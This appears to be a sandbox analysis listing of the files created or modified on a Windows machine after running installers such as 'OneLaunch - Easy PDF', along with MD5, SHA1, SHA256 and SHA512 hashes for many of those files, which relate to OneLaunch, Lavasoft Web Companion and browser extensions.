C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms
| MD5 | 7a4d578b72f7d86b6592d96259b9143a |
| SHA1 | 3e17ea90ece7706f79956a6f566511454a387812 |
| SHA256 | 80493ab8129bc641876fba7092b41ab124b53acd74570ab3fa6f70cb1428a353 |
| SHA512 | d73603f3470be77c6e046055e9ac4f090a1fc06a3599b2582c2206b740aaf4453237d50cd063b4944a2112bf5a7067759c2291e79dcd0b8ff6d3d15236b005a4 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\fd84beb1-565f-40cf-a719-39eb28111072.tmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\Downloads\HappyMod-3-0-0.apk
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5de235.TMP
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt.tmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00007f
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\Downloads\MinecraftInstaller.exe
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\Downloads\OneLaunch - Easy PDF_3x8a5.exe
C:\Users\Admin\AppData\Local\Temp\is-8UTO4.tmp\Win32Library.dll
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Temp\is-8UTO4.tmp\onelaunch.png
C:\Users\Admin\AppData\Local\Temp\is-8UTO4.tmp\pdf.png
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Temp\OneLaunch Setup.exe
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00009f
C:\Users\Admin\AppData\Local\Temp\is-2QT22.tmp\split_tests.json
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000a7
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000a8
C:\Users\Admin\AppData\Local\Temp\is-2QT22.tmp\min-10-light.png
C:\Users\Admin\AppData\Local\Temp\is-2QT22.tmp\min-rest.bmp
C:\Users\Admin\AppData\Local\Temp\is-2QT22.tmp\checkmark-10-light.png
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\ProgramData\Malwarebytes\MBAMService\version.dat
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\MANIFEST-000001
C:\Users\Admin\AppData\Local\OneLaunch\profile.ico
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5f0fa9.TMP
C:\Users\Admin\AppData\Local\Temp\is-2QT22.tmp\button-10-light.png
C:\Users\Admin\AppData\Local\Temp\is-2QT22.tmp\exit-10-light.png
C:\Users\Admin\AppData\Local\Temp\is-2QT22.tmp\button-rest.bmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000bc
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\OneLaunch.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\user.config
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\user.config
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Options\ActiveFeatures.zip
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\45ronkyc.newcfg
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\dvxl21bh.newcfg
C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Options\ServicePartnerInfo.txt
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\oh0n0qhq.newcfg
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Code Cache\js\index
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\ce5be573-9ecb-48cf-b205-7a7dbf9fddbe.tmp
C:\Users\Admin\AppData\Local\Temp\653E0C5.tmp
C:\Users\Admin\AppData\Local\Temp\653E2EC.tmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000009
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\xap1qsvs.newcfg
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Lavasoft\Web Companion\Logs\Webcompanion\webcompanion.log
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\mrgo4zcy.newcfg
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\wzpr14tg.newcfg
C:\Users\Admin\AppData\Local\Temp\7c8b9257-b1b6-497f-bfb4-dc8db27a566c.tmp
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\extensions\gcklppdiegejnfnpepkaagjmdneobkgi.crx
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Local State
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Cache\Cache_Data\data_3
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Cache\Cache_Data\data_2
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Cache\Cache_Data\data_1
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Cache\Cache_Data\data_0
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Preferences~RFe6000cf.TMP
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Local State~RFe5ffff4.TMP
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\lqxhbnhd.newcfg
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Temp\f90686bb-cbf5-4284-92b9-90b82a6a4a36.tmp
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\3p435y4k.newcfg
C:\Users\Admin\AppData\Local\Temp\scoped_dir6068_867788808\CRX_INSTALL\src\contentScript\globalInjector\index.js
C:\Users\Admin\AppData\Local\Temp\scoped_dir6068_867788808\CRX_INSTALL\src\contentScript\globalStart\index.js
C:\Users\Admin\AppData\Local\Temp\scoped_dir6068_867788808\CRX_INSTALL\src\contentScript\slickdealsDealDetails\index.js
C:\Users\Admin\AppData\Local\Temp\scoped_dir6068_867788808\CRX_INSTALL\src\contentScript\slickdealsIdle\index.js
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak
C:\Users\Admin\AppData\Local\Temp\scoped_dir6068_867788808\CRX_INSTALL\assets\src\contentScript\slickdealsStart\index.a0908cfc.js
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Extensions\gcklppdiegejnfnpepkaagjmdneobkgi\3.5.3_0\icons\16.png
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Extensions\gcklppdiegejnfnpepkaagjmdneobkgi\3.5.3_0\manifest.json
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Extensions\gcklppdiegejnfnpepkaagjmdneobkgi\3.5.3_0\serviceWorker.js
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Local State
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Secure Preferences
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Secure Preferences~RFe6040c6.TMP
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000ae
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000b9
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000bb
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000ba
C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Options\AppSettings.txt
C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Options\WebProtectionConfig.txt
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Local State
C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Options\ActiveFeatures.zip
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\g4gegdoj.newcfg
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\ci0iyjn2.newcfg
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Extensions\hffgmnbojgnbalmhedkdikfhaflnfcno\1.9_0\bookmark.json
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe6069e9.TMP
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Local State
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000a
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000b
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\0g41fqai.newcfg
C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Options\FeatureActions.zip
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\54339c70-e57f-42c5-a1fc-67071999a6f4.tmp
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\sg1msazc.newcfg
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir2744_490999851\Icons Monochrome\16.png
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir2744_2016021875\Shortcuts Menu Icons\Monochrome\0\512.png
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir2744_2016021875\Shortcuts Menu Icons\Monochrome\1\512.png
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000d2
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000d1
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\1zubgcx0.newcfg
| MD5 | 2bf2f89699d9256ed35fd2457fde1ce7 |
| SHA1 | 4ba877f173f33669178477c66f13b8e9c37c7509 |
| SHA256 | e486d70e04be7afe865ca53b3cae2189a243c137e7efc7ae20599131d5f7ea09 |
| SHA512 | 532f66b949868594c1c32e942e499c5a034b1dfb884948951d0208406898d26bfc2de507f4ac924c984fa23ce81eec743cc2b92041bb82acd228fa0ac4c8581d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 724a0921dc563c99ed9a3eae5e643ea1 |
| SHA1 | 295cfe13a972a5be04182f289d0f61295d12d03f |
| SHA256 | 4228e628eb7bd204a7ccd03297a74e9367ede8493d6c166583567b4bbcec5ca8 |
| SHA512 | 278a87bcbc2c7dc1cb5c2d3c8aed26c8e9f1973669ac98eb568859f4541054c15e84f58b78f26b40d91d91d17c39cdfa8f28e9ef2e2251e883860681acb710ab |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000d6
| MD5 | 2e9dd8de5b06aadd0a4c59d1579aa31a |
| SHA1 | ba1c3a6372ad460969446c07f7e0238e5ab2beaa |
| SHA256 | 3a9b594a6feed275a7154ec696afe67c44d428ec957ea1e032c19688a8842b79 |
| SHA512 | 2ebcfc95ea65cd9ebd50d3653b7f41b7c79aa1c0a9040ed26fb69803335b97067ce28528b180ad70b780456421248b3c9c15161efeba0f403d2b8a098648ffd5 |
C:\ProgramData\Malwarebytes\MBAMService\config\IrisData.json
| MD5 | 8d6bda5f6183c4f1960da58a8367d682 |
| SHA1 | 93a5fe79b8dc00ec8a2cfb1633b1d919d374d894 |
| SHA256 | 4355adb287909be3ae9ca01fab57f5433793307de49bd9d709563cfd15f8f7ea |
| SHA512 | 3cd07edd03a822fb469fa976deac0576b57494b1bb7e484ecbea70f74e1694a7e77a8dbc3a56bd340a0298cfb6382190b32ab2563b692f6dc68be22f45bf50c2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 3e6bdf331b05a0880ac974d0bf7875d8 |
| SHA1 | 56430ae5da0f0e08577639228e4d9db393cc3c61 |
| SHA256 | c5bbc86d4653fc601be8a297bc2985b18d597c5a3b8b68ca575534edb5fa8809 |
| SHA512 | ebfefd438ca4deaf01d44c2692528f3292fdd8585ddf5b63ff14e82c02d48327a65ddd01cf311f694a35dbec5cdffc94f35ac383eb17b4923c4475570129174d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 0623fc1a852b3071aa3c14eea9e10a68 |
| SHA1 | 9c4197da78ca4bd3b295e23cae0ab2813a3def09 |
| SHA256 | 3adcc21c75299a9afc8695f337e73436674904ed66767b9a49ac2f1026225b98 |
| SHA512 | 655914c588a6885f063c2eb008fa37816c5755d57b51f5ff1fce4665241cab6677bc6ee9e85dcdf5fb0b448195d43801a94a81f4fe4d1e1a54dac9f541032138 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | cbe4f8e52d6171311e0c4c268a2d0c94 |
| SHA1 | 06c91f800f348e4201c1a01b9f687f39482d170e |
| SHA256 | 879291b2e9cb83de603885b49346e4c3636d2156707526f8dde8b5a38ed6e7c5 |
| SHA512 | 85a9a181ecfe7c7b5d9fe020abc4f5ac0692cb2a71ba8ba25beabd593388f08374cea33090b0b4a8b1bdac012164ed82fecb3c706b7e7efc9d4cbf807c40794c |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Preferences
| MD5 | a7c28be64c192c1d72cc92d680b5a731 |
| SHA1 | 8ad22fc7122ce153544d7f8718244d852e4088e4 |
| SHA256 | 59787a97f4f507813bd6c126e51a52facf94b846351cb388230835c4742a970c |
| SHA512 | 64db354d2312a318590c4da691cf45e7c71cdcb0d10dfd6aa08c9b230dd571e29009014707217ce986fb0691e2d6c2283e81925bfe5bf9715ff9134cee4a91a2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | e440d3d20473c44c51ac2a8b5e7d2809 |
| SHA1 | c26ff61d8be91fa4601ad11b8e9acd913e0bbf89 |
| SHA256 | f900f1b15c311cb9f3c0d76eb321767ee5537350a5e5c6e44014312097dc4e8f |
| SHA512 | e5b0bcacb64269bccd6c9e4455ce428022ffa0b8b50cc45ef4f09ddaaecbcd4eb323b784d388b37b7a1c0f1ba70fdaa7e7cc061b0b3644f87eec2247f6a9bacb |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Extensions\gcklppdiegejnfnpepkaagjmdneobkgi\3.5.3_0\assets\src\background\index.c3470784.js
| MD5 | 1bcb87bfe1672dd9d5b6d2ec4bdd1440 |
| SHA1 | 7af255523505b9e6c0cf373484127c4401861b1b |
| SHA256 | e51b2907b1e86b1c58ade11475a6eb1ee1454f0c524cd8e6102ab5fc76d0b5c4 |
| SHA512 | 0ef4fdcb8e038d75fe271bd60f57cc92dc1e00a4acec13bca416001ffd305561cf3ebc6ef0bfb3a9a2cc4946706e893b072bf9c0a66e1e3fce18813f26a72587 |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Extensions\gcklppdiegejnfnpepkaagjmdneobkgi\3.5.3_0\assets\popupInitializer.ee567670.js
| MD5 | 68f1d1b16ed68737147103e509a2e4f5 |
| SHA1 | 1a5880149ee4c86f2cd43b1d07d170b1c9476eda |
| SHA256 | eb2ead8ce52358f547bdbd4f737f27cdea65078b9d8746a0f73eb3596a765af2 |
| SHA512 | 775084ff48e7d6ed71ac0e793a2b932f99685fc615664b2b0ecf56f621d1fc70362d09da15f445dc033cea973d7b0447a79a73f969c43bc95ffd568e45f1fe03 |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Extensions\gcklppdiegejnfnpepkaagjmdneobkgi\3.5.3_0\assets\devLog.fc48ebad.js
| MD5 | 9db618256c16923d4be2d163196b028d |
| SHA1 | adfa216df1a5e9eb88fdd755b335c393bf0fd7a0 |
| SHA256 | 1e88e611c49a97f75e2a4c17a06448b4e7cced3f94139181c9641226a6c10b28 |
| SHA512 | ce184074527b8ce85181c045eb0af2787f5a5f66448d8ddf4a6db1a92a1cf1d8ad7b85883398d0eeeb8e79a2e3f51ef9b33286379de0308686a08dc6121489b7 |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Extensions\gcklppdiegejnfnpepkaagjmdneobkgi\3.5.3_0\assets\index.0a1d9bc1.js
| MD5 | a9881409aa51da613775f3413ff5165c |
| SHA1 | 6f6f016a330bc9c152839f839aa2b785ab44e01d |
| SHA256 | 4f291e9a648c109b78669cd878f8e6b5e32333b10a3d73a7c19df2ff8e03fccb |
| SHA512 | 58b035189bb35f6819343cab6e28d23155e90fb47eed930d158fb43398c47348f9062bb92e0a6681e3983849ea2c485385f21f63dfc7e5e97f46657fc3cc6798 |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Extensions\gcklppdiegejnfnpepkaagjmdneobkgi\3.5.3_0\assets\loyaltyOfferService.4f4dbe5f.js
| MD5 | e4a9f2b0e51084e81ca6c0b658277ee5 |
| SHA1 | 45a86f5b7741339efde55e55c9765c6e9b65525f |
| SHA256 | 18c195435be4e22778f0f1c52f5a63f926d12a9d6b8c8323e10ebb299f275f07 |
| SHA512 | f734589bd7b6a0d0249fcc33b8f905ab1ee48ca1ceca6aa1ae79292f0b538e815455b7a4617186194ae079aa2531f98db470f3f0e23cdeddb419bc86c6531ba9 |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Extensions\gcklppdiegejnfnpepkaagjmdneobkgi\3.5.3_0\assets\directToMerchantOnboardingService.4d58e5e4.js
| MD5 | 0e394aa21637d49b1ef3fa330b3c6824 |
| SHA1 | e1036eacebee448e5a54193626a4a6b74e23bf40 |
| SHA256 | 71041e19472c9d5cd9e914d2d613eaf281bb1ac660b3f5ecd20ca8f97f005ba3 |
| SHA512 | e207b43120e24de398e7878abe3d2d8a947fcf9590cc8b223f1c16abb85339bdb9af7a08fb39761b3f796a65be913623aef1afe2ed6196d49e8adc528230c084 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 2cb459c9320ae4fdf7e9ed2af55a2791 |
| SHA1 | 8024f198a5248e8e38c97fb3c941ae961052b4b0 |
| SHA256 | 2c047cb034d00aca48f03764cbce555f538b7c79e4713f79f1285469faafa657 |
| SHA512 | 06229d73b3ae771596b54211602cb99de7d2f4f394bbb66fac7aba5794b77a3df0ce3e0629034d8acb0782137d9150f6f3bdb28996e861a43de8e209cb56645f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\75b2659b-53e5-4585-8352-15200834de6a\index-dir\the-real-index
| MD5 | 8110acbaa8f1d4c57d6280f246948e11 |
| SHA1 | 08698b9bdb75da88b880391c3a9d83329e729e42 |
| SHA256 | 4a497a7dd41970904a00f5f82cc71e05dc6345c0d96d13df93cb16e4634e0ebc |
| SHA512 | 936f81fdbb29949fe2a690cd78af6e45000aa2af0c3ac27cd17df5ebe961da3b1b2114360425e2852ecfd3b59fe7c84605221cb5a7c2641c4a7918f0a6e03ca2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\75b2659b-53e5-4585-8352-15200834de6a\index-dir\the-real-index~RFe610c25.TMP
| MD5 | 97d9d2e4a7b0e55e222a0af9fa029f0a |
| SHA1 | 6d89ea8d5c81fdfe6128daf16e707a70424a752a |
| SHA256 | 6ba3c4211364fe045aa5c5f08a457131b782dde3fc5d60d8a8ac7ed77f118c0c |
| SHA512 | 8e488f60f0ea88aa067558aefe7bcac8eb559c2301fe158128be59a91fee835eaa1e94aa6975924df759425f6628d8d34f77cbb0e74b59fe75167f60012991e7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 2abf6ce90abc5c5d891dc489417dd5f2 |
| SHA1 | 4a5df27994f8c91c0f5ef91146238b9b1441547f |
| SHA256 | 21ad6ad7325bd42c8d46dfb9e40279e02f51e31f4d3928809590fa8bffdf5c2f |
| SHA512 | 68c1f95561389793ae6cff9025d9236a92c2a2d26042ae29b93e0dbee1081b9967d6f3fa7019293271101d4e48abc0db493a2132083fd3e2f3b86d574e9bec1f |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Network\Network Persistent State
| MD5 | 9684e8e80caef9154831bff9557bd50c |
| SHA1 | 925fc3321b7487cc263601606cfa3321f80c9ac0 |
| SHA256 | f8d51e8638af94e064a75a49e3c3bbd772d2269188d216787f15f17a72c5ba59 |
| SHA512 | ca9bc8f3b2216a3563be2d82b6dd89f38926c9288328f2e1a2f84d9eb430190cdfa1e5255884dd9c137eb1c084fb78444961193662f327e48128e2ddd2a0c827 |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Network\Network Persistent State~RFe611378.TMP
| MD5 | 2800881c775077e1c4b6e06bf4676de4 |
| SHA1 | 2873631068c8b3b9495638c865915be822442c8b |
| SHA256 | 226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974 |
| SHA512 | e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Network\TransportSecurity~RFe611d1c.TMP
| MD5 | 55b23f78b9bb3bb321779f0ae42943a7 |
| SHA1 | f548fbbe3a19a16a70f6b9b126fa666f8d0bfc58 |
| SHA256 | ce2b1f7a7630b1d622e0eea6a88c7db2b2277307e46d577577de3388eb997225 |
| SHA512 | 23a1ff2587c51e6d2d923a46731d86cd9f6483626f433e1d8520245ffb2ee38d3e8c8ceb45e150ef4889974c0d37e516399cbb328e2247f68a4b5983cfbae1de |
C:\Users\Admin\AppData\Local\OneLaunch\User Data\Default\Network\TransportSecurity
| MD5 | 88c2fbdca7bf0dbc0cd6fa9bc18c1da2 |
| SHA1 | 5f40b00a72c9fefd32afcb60e174b17bfb6d5038 |
| SHA256 | 45bce83352dec9b2838d2a272b747504b0becf98db5a5974e1cfe6d4f7bf6f35 |
| SHA512 | 014e26fac698ede5272632e41dd333fa889b3ab78a45ba5bb15f05fd87724edf71cfe36c9808fd816e1d7dc2ed515325963ca85f83d03c1c42d3a222732cbaee |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\75b2659b-53e5-4585-8352-15200834de6a\a2700278d688ec05_0
| MD5 | 4ead7553c4b4a88ebb050ea648026053 |
| SHA1 | 89a312aeff1c20f51845b4569bfc9917c3f17ca6 |
| SHA256 | 053ca8a11093446fae840f577f37c176d9e388e23d669c9592a84b57c33393df |
| SHA512 | 3d5325b9b0cca7a30fc2c110e2bf49793898966b08267133cdb32a403547b9b7263f056ab98bbabd3e45fc133d51b2031a75c7ca0e49b13a956b646c3dfe692a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 8c03d12300173ee32c20ec26ce1f4b0c |
| SHA1 | f2f2a5063ea42ef114c9dcebf4dade4c684c113b |
| SHA256 | ff6a34a0fcf00d9739f8a3cf1579256b791bb9e60d9cf8158c120a0f39be00b3 |
| SHA512 | b0dfd02da37a84cdb7a9b4921fc59b618138af96d1720e7fa4d4feba8c0f0680619a397af0ff28cd2b522c3484771a8ec480961ea090b3db295e7cdb2b54c6ee |
